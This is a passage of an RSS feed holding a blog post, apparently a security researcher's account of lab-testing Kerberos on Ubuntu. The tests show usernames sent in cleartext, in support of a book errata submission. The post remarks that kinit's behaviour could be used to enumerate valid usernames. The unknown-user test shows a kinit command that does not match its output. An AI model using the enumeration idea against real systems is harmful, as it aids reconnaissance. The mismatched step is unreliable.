&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    plaintextusername@myrealm        *
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;:wq
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;sudo systemctl restart krb5-admin-server.service
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;kinit plaintextusername
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;deloril@ubuntu:~$ klist
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Ticket cache: FILE:/tmp/krb5cc_1000
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Default principal: plaintextusername@myrealm
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Valid starting       Expires              Service principal
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;03/13/2020 15:39:57  03/14/2020 01:39:57  krbtgt/myrealm@myrealm
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;	renew until 03/14/2020 15:39:55
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;h5 id=&#34;client-setup-1&#34;&gt;Client Setup
&lt;/h5&gt;&lt;p&gt;For the client, I followed &lt;a class=&#34;link&#34; href=&#34;https://help.ubuntu.com/lts/serverguide/kerberos.html&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;this guide&lt;/a&gt;, running the below commands:&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt;1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;2
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;3
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;4
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;sudo apt install krb5-user libpam-krb5
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Realm: myrealm
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Server: 10.1.1.5
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;AS: 10.1.1.5
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;h5 id=&#34;linux-test&#34;&gt;Linux Test
&lt;/h5&gt;&lt;p&gt;On the client, attempt to authenticate as &lt;code&gt;mydomain\plaintextusername&lt;/code&gt; and &lt;code&gt;mydomain\unknownuser&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For the known user test, we&amp;rsquo;re attempting to authenticate with a valid credential. If you want to follow along, the &lt;a class=&#34;link&#34; href=&#34;linux-knownuser.pcap&#34; &gt;pcap is here&lt;/a&gt;. To generate this traffic, we ran the below commands:&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt; 1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 2
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 3
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 4
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 5
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 6
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 7
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 8
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 9
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;10
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;kinit plaintextusername@myrealm
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;password: &amp;lt;redacted&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;deloril@ubuntu:~$ klist
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Ticket cache: FILE:/tmp/krb5cc_1000
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Default principal: plaintextusername@myrealm
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Valid starting       Expires              Service principal
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;03/13/2020 16:00:04  03/14/2020 02:00:04  krbtgt/myrealm@myrealm
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;	renew until 03/14/2020 16:00:01
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;As shown below the CNameString plaintextusername and the realm mydomain are being passed across the network in clear text in packet 4.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/linux-knownuser.png&#34;
	width=&#34;633&#34;
	height=&#34;580&#34;
	srcset=&#34;https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/linux-knownuser_hu_6cfc39dedb95ce19.png 480w, https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/linux-knownuser_hu_eaa1024ba8583e2f.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Packet 4 of linux-knownuser.pcap&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;109&#34;
		data-flex-basis=&#34;261px&#34;
	
&gt;&lt;/p&gt;
&lt;p&gt;For the known user test, we&amp;rsquo;re attempting to authenticate with a valid credential. If you want to follow along, the &lt;a class=&#34;link&#34; href=&#34;linux-knownuser.pcap&#34; &gt;pcap is here&lt;/a&gt;. To generate this traffic, we ran the below commands:&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt;1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;2
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;kinit plaintextusername@myrealm
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;kinit: Client &amp;#39;unknownuser@myrealm&amp;#39; not found in Kerberos database while getting initial credentials
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;As shown below the CNameString unknownuser and the realm mydomain are being passed across the network in clear text in packet 4.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/linux-unknownuser.png&#34;
	width=&#34;614&#34;
	height=&#34;537&#34;
	srcset=&#34;https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/linux-unknownuser_hu_c6efcd9fb6e742c6.png 480w, https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/linux-unknownuser_hu_3aee417ab8e6e20d.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Packet 4 of linux-unknownuser.pcap&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;114&#34;
		data-flex-basis=&#34;274px&#34;
	
&gt;&lt;/p&gt;
&lt;p&gt;Interestingly, ubuntu doesn&amp;rsquo;t ask for a password when you run kinit until AFTER it receives the response from the server indicating the username was valid or not. This makes sense as far as our research goes, but was interesting to me, and it could be used to enumerate valid usernames.&lt;/p&gt;
&lt;h3 id=&#34;conclusion&#34;&gt;Conclusion
&lt;/h3&gt;&lt;p&gt;This doesn&amp;rsquo;t need to be fluffy, it should be concise and report your findings and conclusion. In this case &amp;ldquo;As the RFC quoted and testing undertaken have shown, neither in theory nor practice is the Authors assertion that at step two of kerberos authentication &amp;ldquo;The client encrypts the username with AES for transmission to the KDC&amp;rdquo; acccurate.&amp;rdquo; is sufficient.&lt;/p&gt;
&lt;h2 id=&#34;conclusive-conclusion&#34;&gt;Conclusive Conclusion
&lt;/h2&gt;&lt;p&gt;Different publishers have different formats for their errata, so format it how they want it. Unfortunately, in this case, I submitted and had my submission acknowledged, but the publisher and authors never provided closure on why the errata wasn&amp;rsquo;t implemented. So it goes, I guess.&lt;/p&gt;
&lt;p&gt;I did provide my findings to the server for the benefit of people who wanted to understand how the real world works, however.&lt;/p&gt;
&lt;h2 id=&#34;additional-note-on-pre-authentication&#34;&gt;Additional Note on Pre-Authentication
&lt;/h2&gt;&lt;p&gt;Note: Modern Kerberos implementations use pre-authentication, where the client sends an encrypted timestamp (using a key derived from the user&amp;rsquo;s password) to prove knowledge of the password. However, the username itself is always sent in cleartext, as specified in RFC 4120 and confirmed by our testing.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>Search</title>
        <link>https://thisinsecureworld.com/search/</link>
        <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/search/</guid>
        <description></description>
        </item>
        
    </channel>
</rss>
